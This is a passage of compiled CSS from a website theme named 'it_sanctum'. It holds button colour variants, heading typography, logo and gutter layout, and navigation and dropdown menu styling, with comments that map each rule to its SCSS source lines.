  border: 1px solid #282828;
}
/* line 62, templates/it_sanctum/scss/sanctum/_core.scss */
.button.dark:hover, .button.dark:active, .button.dark:focus {
  background: #474747;
}
/* line 66, templates/it_sanctum/scss/sanctum/_core.scss */
.button.empty {
  background: none;
  border: 1px solid #4f953b;
  color: #4f953b;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
/* line 71, templates/it_sanctum/scss/sanctum/_core.scss */
.button.empty:hover {
  color: #fff;
  background: #4f953b;
}
/* line 78, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 79, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-grey {
  background: #a8a8a8;
  color: #fff;
  border: 1px solid #a8a8a8;
}
/* line 83, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-grey:hover {
  background: #999;
  border: 1px solid #999;
}
/* line 88, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-green {
  background: #4f953b;
  border: 1px solid #4f953b;
}
/* line 91, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-green:hover {
  background: #437f32;
  border: 1px solid #437f32;
}
/* line 96, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-orange {
  background: #f26d5b;
  border: 1px solid #f26d5b;
}
/* line 99, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-orange:hover {
  background: #f0543f;
  border: 1px solid #f26d5b;
}
/* line 104, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-purple {
  background: #8283a7;
  border: 1px solid #8283a7;
}
/* line 107, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-purple:hover {
  background: #70719a;
  border: 1px solid #70719a;
}
/* line 112, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-blue {
  background: #2b90d9;
  border: 1px solid #2b90d9;
}
/* line 115, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-blue:hover {
  background: #2380c3;
  border: 1px solid #2380c3;
}
/* line 120, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-xlarge {
  font-size: 1.4rem;
}
/* line 123, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-large {
  font-size: 1.2rem;
}
/* line 126, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-small {
  font-size: 0.8rem;
}
/* line 129, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-xsmall {
  font-size: 0.7rem;
}
/* line 132, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-block {
  display: block;
}
/* line 137, templates/it_sanctum/scss/sanctum/_core.scss */
.g-title {
  margin-top: -5px;
  margin-bottom: 30px;
  position: relative;
}
/* line 141, templates/it_sanctum/scss/sanctum/_core.scss */
.g-title:after {
  content: "";
  height: 1px;
  width: 70px;
  margin: 20px 0;
  display: block;
  background: #ddd;
}
/* line 151, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 152, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 153, templates/it_sanctum/scss/sanctum/_core.scss */
#g-offcanvas .g-title:before, .g-particle-intro .g-title:before, #g-offcanvas .g-title:after, .g-particle-intro .g-title:after {
  display: none;
}
/* line 159, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 160, templates/it_sanctum/scss/sanctum/_core.scss */
#g-aside .g-title, #g-sidebar .g-title {
  font-size: 1.35rem;
  margin-top: 0;
  margin-bottom: 25px;
}
/* line 164, templates/it_sanctum/scss/sanctum/_core.scss */
#g-aside .g-title:before, #g-sidebar .g-title:before, #g-aside .g-title:after, #g-sidebar .g-title:after {
  width: 60px;
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  #g-aside .g-title:before, #g-sidebar .g-title:before, #g-aside .g-title:after, #g-sidebar .g-title:after {
    display: none;
  }
}
/* line 171, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 172, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 173, templates/it_sanctum/scss/sanctum/_core.scss */
#g-aside .text-center .g-title:before, #g-sidebar .text-center .g-title:before, #g-aside .title-center .g-title:before, #g-sidebar .title-center .g-title:before, #g-aside .text-center .g-title:after, #g-sidebar .text-center .g-title:after, #g-aside .title-center .g-title:after, #g-sidebar .title-center .g-title:after {
  width: 40px;
}
/* line 178, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 179, templates/it_sanctum/scss/sanctum/_core.scss */
#g-aside .g-content > div, #g-sidebar .g-content > div {
  margin-bottom: 50px;
}
/* line 181, templates/it_sanctum/scss/sanctum/_core.scss */
#g-aside .g-content > div:last-child, #g-sidebar .g-content > div:last-child {
  margin-bottom: 0;
}
/* line 189, templates/it_sanctum/scss/sanctum/_core.scss */
.border-bottom {
  border-bottom: 1px solid #ddd;
}
/* line 193, templates/it_sanctum/scss/sanctum/_core.scss */
.border-top {
  border-top: 1px solid #ddd;
}
/* line 197, templates/it_sanctum/scss/sanctum/_core.scss */
.g-logo {
  margin: 10px 0;
  display: inline-block;
}
/* line 199, templates/it_sanctum/scss/sanctum/_core.scss */
.g-logo > .g-content {
  margin-top: 0;
  margin-bottom: 0;
}
@media only all and (max-width: 47.938rem) {
  .g-logo {
    display: block;
    text-align: center;
  }
}
/* line 208, templates/it_sanctum/scss/sanctum/_core.scss */
.g-logo img {
  width: auto;
}
/* line 213, templates/it_sanctum/scss/sanctum/_core.scss */
.logo-large {
  display: inline-block;
}
/* line 218, templates/it_sanctum/scss/sanctum/_core.scss */
.g-gutter {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
/* line 221, templates/it_sanctum/scss/sanctum/_core.scss */
.g-gutter .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
/* line 229, templates/it_sanctum/scss/sanctum/_core.scss */
.fullwidth-section {
  padding: 0 !important;
}
/* line 231, templates/it_sanctum/scss/sanctum/_core.scss */
.fullwidth-section > .g-container {
  width: 100%;
}
/* line 234, templates/it_sanctum/scss/sanctum/_core.scss */
.fullwidth-section .g-content {
  padding: 0;
  margin: 0;
}
/* line 241, templates/it_sanctum/scss/sanctum/_core.scss */
.g-center-vertical {
  display: -webkit-box;
  display: -moz-box;
  display: box;
  display: -webkit-flex;
  display: -moz-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -moz-box-align: center;
  box-align: center;
  -webkit-align-items: center;
  -moz-align-items: center;
  -ms-align-items: center;
  -o-align-items: center;
  align-items: center;
  -ms-flex-align: center;
}
/* line 247, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 248, templates/it_sanctum/scss/sanctum/_core.scss */
.tooltip h1, .tooltip h2, .tooltip h3, .tooltip h4, .tooltip h5, .tooltip h6, .tooltip strong {
  color: #fff !important;
}
/* line 254, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 255, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 256, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 257, templates/it_sanctum/scss/sanctum/_core.scss */
.presets-demo .g-dropdown .g-menu-item-container:before {
  content: "";
  position: absolute;
  width: 20px;
  height: 20px;
  margin-top: 2px;
  border-radius: 0px;
  background: #000;
  border: 1px solid #fff;
}
/* line 267, templates/it_sanctum/scss/sanctum/_core.scss */
.presets-demo .g-dropdown .g-menu-item-container .g-menu-item-content {
  margin-left: 30px;
}
/* line 271, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 272, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 273, templates/it_sanctum/scss/sanctum/_core.scss */
.presets-demo .g-dropdown .preset1 .g-menu-item-container:before {
  background: #c91f37;
}
/* line 278, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 279, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 280, templates/it_sanctum/scss/sanctum/_core.scss */
.presets-demo .g-dropdown .preset2 .g-menu-item-container:before {
  background: #4f953b;
}
/* line 285, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 286, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 287, templates/it_sanctum/scss/sanctum/_core.scss */
.presets-demo .g-dropdown .preset3 .g-menu-item-container:before {
  background: #f26d5b;
}
/* line 292, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 293, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 294, templates/it_sanctum/scss/sanctum/_core.scss */
.presets-demo .g-dropdown .preset4 .g-menu-item-container:before {
  background: #8283a7;
}
/* line 299, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 300, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 301, templates/it_sanctum/scss/sanctum/_core.scss */
.presets-demo .g-dropdown .preset5 .g-menu-item-container:before {
  background: #2b90d9;
}
/* line 306, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 307, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 308, templates/it_sanctum/scss/sanctum/_core.scss */
.presets-demo .g-dropdown .preset6 .g-menu-item-container:before {
  background: #f2aa0f;
}
/* line 316, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 317, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 318, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 319, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 320, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 321, templates/it_sanctum/scss/sanctum/_core.scss */
#g-mobilemenu-container .presets-demo .g-dropdown .g-go-back .g-menu-item-container:before {
  content: "\f053";
  position: relative;
  width: 1.28571em;
  height: auto;
  margin-top: 0;
  border-radius: 0;
  background: none;
}
/* line 330, templates/it_sanctum/scss/sanctum/_core.scss */
#g-mobilemenu-container .presets-demo .g-dropdown .g-go-back .g-menu-item-container .g-menu-item-content {
  margin-left: 30px;
}
/* line 339, templates/it_sanctum/scss/sanctum/_core.scss */
.g-perso {
  font-family: "Lato";
  font-weight: 400;
  font-size: 0.9rem;
  color: #fff;
  background-color: #7ac572;
}
/* line 348, templates/it_sanctum/scss/sanctum/_core.scss */
.g-perso-left {
  margin-bottom: 0;
  border-left: -20px solid white;
  background-color: #fff;
}
/* line 354, templates/it_sanctum/scss/sanctum/_core.scss */
.g-image2 {
  background-image: url('//www.ptits-anes.fr/images/Demo/elements/story2.jpg');
  background-repeat: no-repeat;
  padding-left: 0px;
  padding-top: 0px;
}
/* line 362, templates/it_sanctum/scss/sanctum/_core.scss */
.g-image3 {
  background-image: url('//www.ptits-anes.fr/images/Demo/elements/story3.jpg');
  background-repeat: no-repeat;
}
/* line 6, templates/it_sanctum/scss/sanctum/_typography.scss */
body {
  font-family: "Lato";
  font-weight: 400;
  font-size: 0.9rem;
}
/* line 12, templates/it_sanctum/scss/sanctum/_typography.scss */
h1, h2, h3, h4, h5, h6 {
  font-family: "Cormorant SC";
  font-weight: 500;
  margin-top: -5px;
}
/* line 18, templates/it_sanctum/scss/sanctum/_typography.scss */
h1 {
  font-size: 2.7rem;
}
/* line 21, templates/it_sanctum/scss/sanctum/_typography.scss */
h2 {
  font-size: 2.07rem;
}
/* line 24, templates/it_sanctum/scss/sanctum/_typography.scss */
h3 {
  font-size: 1.8rem;
}
/* line 27, templates/it_sanctum/scss/sanctum/_typography.scss */
h4 {
  font-size: 1.35rem;
}
/* line 30, templates/it_sanctum/scss/sanctum/_typography.scss */
h5 {
  font-size: 0.9rem;
}
/* line 33, templates/it_sanctum/scss/sanctum/_typography.scss */
h6 {
  font-size: 0.81rem;
}
/* line 37, templates/it_sanctum/scss/sanctum/_typography.scss */
.g-main-nav {
  font-family: "Cormorant SC";
  font-weight: 400;
  font-size: 1rem;
}
/* line 43, templates/it_sanctum/scss/sanctum/_typography.scss */
.g-main-nav .g-dropdown {
  font-size: 0.9rem;
}
/* line 47, templates/it_sanctum/scss/sanctum/_typography.scss */
bold, strong {
  font-weight: 700;
}
/* line 51, templates/it_sanctum/scss/sanctum/_typography.scss */
.button {
  font-weight: 500;
}
/* line 56, templates/it_sanctum/scss/sanctum/_typography.scss */
blockquote {
  border-left: 10px solid #f0f2f4;
}
/* line 58, templates/it_sanctum/scss/sanctum/_typography.scss */
blockquote p {
  font-size: 1rem;
  color: #c8c8c8;
  margin-bottom: 1rem !important;
}
/* line 63, templates/it_sanctum/scss/sanctum/_typography.scss */
blockquote cite {
  display: block;
  text-align: right;
  color: #959595;
  font-size: 1.1rem;
}
/* line 69, templates/it_sanctum/scss/sanctum/_typography.scss */
/* line 70, templates/it_sanctum/scss/sanctum/_typography.scss */
blockquote small:before {
  content: none !important;
}
/* line 77, templates/it_sanctum/scss/sanctum/_typography.scss */
code {
  background: #fafafa;
  color: #d05;
  font-size: 0.81rem;
  border: 1px solid #ddd;
}
/* line 84, templates/it_sanctum/scss/sanctum/_typography.scss */
pre {
  padding: 1rem;
  margin: 2rem 0;
  background: #f8f8f8;
  border: 1px solid #ddd;
  border-radius: 0;
  line-height: 1.15;
  font-size: 0.81rem;
  border: 1px solid #ddd;
}
/* line 94, templates/it_sanctum/scss/sanctum/_typography.scss */
pre code {
  color: #237794;
  background: inherit;
  font-size: 0.81rem;
}
/* line 99, templates/it_sanctum/scss/sanctum/_typography.scss */
pre.prettyprint {
  border: 1px solid #ddd !important;
  padding: 1rem !important;
}
/* line 106, templates/it_sanctum/scss/sanctum/_typography.scss */
hr {
  border-bottom: 1px solid #ddd;
}
/* line 108, templates/it_sanctum/scss/sanctum/_typography.scss */
hr.uk-article-divider {
  border-color: #ddd;
  margin-bottom: 35px;
}
/* line 114, templates/it_sanctum/scss/sanctum/_typography.scss */
* + .uk-article-divider {
  margin-top: 35px;
}
/* line 118, templates/it_sanctum/scss/sanctum/_typography.scss */
.uk-table-hover tbody tr:hover {
  background: #ddd;
}
/* line 122, templates/it_sanctum/scss/sanctum/_typography.scss */
.uk-badge {
  margin-right: 5px;
}
/* line 126, templates/it_sanctum/scss/sanctum/_typography.scss */
/* line 127, templates/it_sanctum/scss/sanctum/_typography.scss */
.g-typography-page > section {
  margin-top: 150px;
}
/* line 129, templates/it_sanctum/scss/sanctum/_typography.scss */
.g-typography-page > section:first-child {
  margin-top: 0;
}
/* line 135, templates/it_sanctum/scss/sanctum/_typography.scss */
iframe {
  border: none;
}
/* line 139, templates/it_sanctum/scss/sanctum/_typography.scss */
/* line 140, templates/it_sanctum/scss/sanctum/_typography.scss */
.uk-accordion .uk-accordion-title {
  background: #ddd;
  border: 1px solid #ddd;
  border-radius: 3px;
}
/* line 147, templates/it_sanctum/scss/sanctum/_typography.scss */
.uk-tab-grid::before {
  border-color: #ddd;
}
/* line 1, templates/it_sanctum/scss/sanctum/_navigation.scss */
#g-navigation {
  background-color: #fff;
  color: #008056;
  text-align: center;
  position: relative;
  z-index: 1002;
}
/* line 14, templates/it_sanctum/scss/sanctum/_navigation.scss */
#g-navigation h1, #g-navigation h2, #g-navigation h3, #g-navigation h4, #g-navigation h5, #g-navigation h6, #g-navigation strong {
  color: #959595;
}
/* line 18, templates/it_sanctum/scss/sanctum/_navigation.scss */
#g-navigation > .g-container {
  position: relative;
}
/* line 22, templates/it_sanctum/scss/sanctum/_navigation.scss */
#g-navigation .g-content {
  padding-top: 0;
  padding-bottom: 0;
  margin-top: 0;
  margin-bottom: 0;
}
/* line 29, templates/it_sanctum/scss/sanctum/_navigation.scss */
#g-navigation.uk-active[data-uk-sticky] {
  box-shadow: 0 3px 3px rgba(0, 0, 0, 0.05);
}
/* line 35, templates/it_sanctum/scss/sanctum/_navigation.scss */
/* line 36, templates/it_sanctum/scss/sanctum/_navigation.scss */
/* line 37, templates/it_sanctum/scss/sanctum/_navigation.scss */
.uk-sticky-placeholder #g-navigation .uk-active {
  box-shadow: 0 3px 3px rgba(0, 0, 0, 0.05);
}
/* line 43, templates/it_sanctum/scss/sanctum/_navigation.scss */
/* line 44, templates/it_sanctum/scss/sanctum/_navigation.scss */
/* line 45, templates/it_sanctum/scss/sanctum/_navigation.scss */
#g-navigation .align-left .g-toplevel, #g-header .align-left .g-toplevel {
  justify-content: flex-start;
  -webkit-justify-content: flex-start;
}
/* line 51, templates/it_sanctum/scss/sanctum/_navigation.scss */
/* line 52, templates/it_sanctum/scss/sanctum/_navigation.scss */
#g-navigation .align-right .g-toplevel, #g-header .align-right .g-toplevel {
  justify-content: flex-end;
  -webkit-justify-content: flex-end;
}
@media print {
  /* line 60, templates/it_sanctum/scss/sanctum/_navigation.scss */
  #g-navigation {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-toplevel > li > .g-menu-item-container, .g-main-nav .g-sublevel > li > .g-menu-item-container {
  padding: 0.2345rem 0.469rem;
  white-space: nowrap;
  -webkit-transition: background 0.2s, color 0.2s;
  -moz-transition: background 0.2s, color 0.2s;
  transition: background 0.2s, color 0.2s;
}
/* line 7, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-standard .g-dropdown {
  width: 180px;
  float: left;
}
/* line 13, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav {
  z-index: 20;
}
/* line 14, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 15, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 16, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 17, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 18, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav:not(.g-menu-hastouch) .g-toplevel > li > .g-menu-item-container .g-menu-parent-indicator {
  display: none;
}
/* line 24, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav:not(.g-menu-hastouch) .g-dropdown {
  z-index: 1003;
}
/* line 29, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 30, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 34, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 36, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 38, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-toplevel > li > .g-menu-item-container {
  line-height: 1;
}
/* line 43, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 44, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-toplevel > li > .g-menu-item-container > .g-menu-item-content {
  line-height: normal;
  text-align: center;
}
/* line 54, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-toplevel > li.g-parent .g-menu-parent-indicator:after {
  width: 1rem;
}
/* line 59, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-toplevel i {
  opacity: 1;
}
/* line 64, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 72, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 78, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-dropdown {
  text-align: left;
  border-radius: none;
}
/* line 81, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.dir-rtl .g-main-nav .g-dropdown {
  text-align: right;
}
/* line 86, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 87, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-sublevel > li {
  margin: 0;
  padding: 0;
}
/* line 90, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-sublevel > li > .g-menu-item-container {
  font-weight: normal;
}
/* line 94, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-sublevel > li > .g-menu-item-container > .g-menu-item-content {
  vertical-align: middle;
}
/* line 98, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 99, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-sublevel > li.g-parent .g-menu-parent-indicator {
  right: 10px;
  top: 13px;
}
/* line 102, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-sublevel > li.g-parent .g-menu-parent-indicator:after {
  content: "\f105";
  opacity: 0.75;
  font-size: 0.9rem;
}
/* line 109, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 110, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 111, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 112, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-sublevel > li:hover.g-parent .g-menu-parent-indicator:after {
  content: "\f105" !important;
}
/* line 121, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 122, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-fullwidth > .g-dropdown {
  margin: 0 1.563rem;
}
/* line 124, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-fullwidth > .g-dropdown[data-g-item-width] {
  margin-left: 0;
  margin-right: 0;
}
/* line 128, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 129, templates/it_sanctum/scss/sanctum/_mainnav.scss */
@media all and (-ms-high-contrast: none), (-ms-high-contrast: active) {
  .g-main-nav .g-fullwidth > .g-dropdown > .g-dropdown-column > .g-grid {
    -webkit-flex-flow: row;
    -moz-flex-flow: row;
    flex-flow: row;
  }
}
/* line 134, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-fullwidth > .g-dropdown > .g-dropdown-column > .g-grid .g-block {
  border-right: 1px solid rgba(255, 255, 255, 0.1);
}
/* line 136, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-fullwidth > .g-dropdown > .g-dropdown-column > .g-grid .g-block:last-child {
  border-right: none;
}
/* line 142, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 143, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 147, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 148, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 149, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-fullwidth > .g-dropdown .g-sublevel > li:hover .g-menu-parent-indicator:after, .g-main-nav .g-fullwidth > .g-dropdown .g-sublevel > li.active .g-menu-parent-indicator:after {
  color: #008056;
  opacity: 1;
}
/* line 155, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-fullwidth > .g-dropdown .g-sublevel > li a {
  padding: 12px 20px !important;
}
/* line 162, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-fullwidth > .g-dropdown .g-sublevel .g-menu-parent-indicator {
  top: 10px !important;
}
/* line 164, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-fullwidth > .g-dropdown .g-sublevel .g-menu-parent-indicator:after {
  background: rgba(0, 0, 0, 0.99);
  color: #fff !important;
  border: 1px solid rgba(255, 255, 255, 0.3);
  border-radius: 4px;
  height: 1.5rem;
  width: 1.5rem !important;
  padding: 0.15rem;
  text-align: center;
  line-height: 18px;
  opacity: 1;
  -webkit-transition: all, 0.2s;
  -moz-transition: all, 0.2s;
  transition: all, 0.2s;
}
/* line 177, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 178, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-fullwidth > .g-dropdown .g-sublevel .g-menu-parent-indicator:hover:after {
  background: rgba(77, 77, 77, 0.99);
}
/* line 189, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-menu-item-subtitle {
  opacity: 1;
}
/* line 199, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-menu-overlay.g-menu-overlay-open {
  z-index: 19;
}
/* line 204, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-main-nav .g-standard .g-dropdown .flyout-left .g-dropdown {
  left: auto;
  right: 100%;
}
/* line 210, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 211, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 212, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 213, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 214, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 215, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 216, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-menu-hastouch .g-standard .g-toplevel > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator, .g-menu-hastouch .g-fullwidth .g-toplevel > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator {
  border-radius: 0;
  margin: -0.2rem 0 -0.2rem 0.5rem;
  padding: 0.2rem;
}
/* line 225, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 226, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 227, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 228, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 229, templates/it_sanctum/scss/sanctum/_mainnav.scss */
.g-menu-hastouch .g-standard .g-sublevel > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator, .g-menu-hastouch .g-fullwidth .g-sublevel > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator {
  border-radius: 0;
  padding: 0.1rem;
  margin-top: -0.1rem;
  margin-right: -0.1rem;
}
/* line 243, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 244, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 245, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 246, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 247, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 248, templates/it_sanctum/scss/sanctum/_mainnav.scss */
[dir="rtl"] .g-main-nav .g-sublevel > li.g-parent .g-menu-item-content {
  margin-right: 0;
  margin-left: 2rem;
}
/* line 252, templates/it_sanctum/scss/sanctum/_mainnav.scss */
[dir="rtl"] .g-main-nav .g-sublevel > li.g-parent .g-menu-parent-indicator {
  right: auto;
  left: 10px;
  margin-top: 3px;
  -webkit-transform: rotate(180deg);
  -moz-transform: rotate(180deg);
  -ms-transform: rotate(180deg);
  -o-transform: rotate(180deg);
  transform: rotate(180deg);
}
/* line 261, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 262, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 263, templates/it_sanctum/scss/sanctum/_mainnav.scss */
[dir="rtl"] .g-main-nav .g-toplevel > li:last-child {
  margin-right: 5px !important;
  margin-left: 5px !important;
}
/* line 266, templates/it_sanctum/scss/sanctum/_mainnav.scss */
[dir="rtl"] .g-main-nav .g-toplevel > li:last-child .g-menu-item-container {
  padding-right: 1rem !important;
}
/* line 272, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 273, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 274, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 275, templates/it_sanctum/scss/sanctum/_mainnav.scss */
/* line 276, templates/it_sanctum/scss/sanctum/_mainnav.scss */
[dir="rtl"] .g-main-nav .g-fullwidth > .g-dropdown > .g-dropdown-column > .g-grid .g-block {
  border-right: none;
  border-left: 1px solid rgba(255, 255, 255, 0.1);
}
/* line 279, templates/it_sanctum/scss/sanctum/_mainnav.scss */
[dir="rtl"] .g-main-nav .g-fullwidth > .g-dropdown > .g-dropdown-column > .g-grid .g-block:last-child {
  border-left: none;
}
/* line 1, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 3, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav {
  margin: 0;
}
/* line 6, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 8, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-toplevel > li {
  margin: 0 5px;
  text-transform: uppercase;
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  #g-navigation .g-main-nav .g-toplevel > li {
    margin: 0;
  }
}
/* line 17, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-toplevel > li > .g-menu-item-container {
  color: #008056;
  padding: 1rem;
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  #g-navigation .g-main-nav .g-toplevel > li > .g-menu-item-container {
    padding: 0.5rem;
  }
}
@media only all and (max-width: 47.938rem) {
  #g-navigation .g-main-nav .g-toplevel > li > .g-menu-item-container {
    padding: 0.5rem;
  }
}
/* line 27, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-toplevel > li > .g-menu-item-container a {
  color: #008056;
}
/* line 29, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-toplevel > li > .g-menu-item-container a:hover {
  color: #4f953b;
}
/* line 36, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 37, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-toplevel > li > .g-menu-item-container .g-menu-parent-indicator:after {
  content: "\f107";
  opacity: 0.75;
  padding: 0.1rem;
  border: 1px solid #ddd;
  background: #f7f7f7;
  margin-left: 2px;
  border-radius: 4px;
  width: 1.2rem;
  text-align: center;
}
/* line 50, templates/it_sanctum/scss/sanctum/_menu.scss */
/* line 51, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-toplevel > li:hover > .g-menu-item-container, #g-navigation .g-main-nav .g-toplevel > li.active > .g-menu-item-container {
  color: #4f953b;
}
/* line 56, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-toplevel > li:hover > .g-menu-item-container > .g-selected, #g-navigation .g-main-nav .g-toplevel > li.active > .g-menu-item-container > .g-selected {
  color: #4f953b;
}
/* line 67, templates/it_sanctum/scss/sanctum/_menu.scss */
#g-navigation .g-main-nav .g-dropdown {
  text-transform: initial;
  color: #fff;
  background: rgba(0, 0, 0, 0.8);
  font-family: "Lato";
  border-radius: 0;
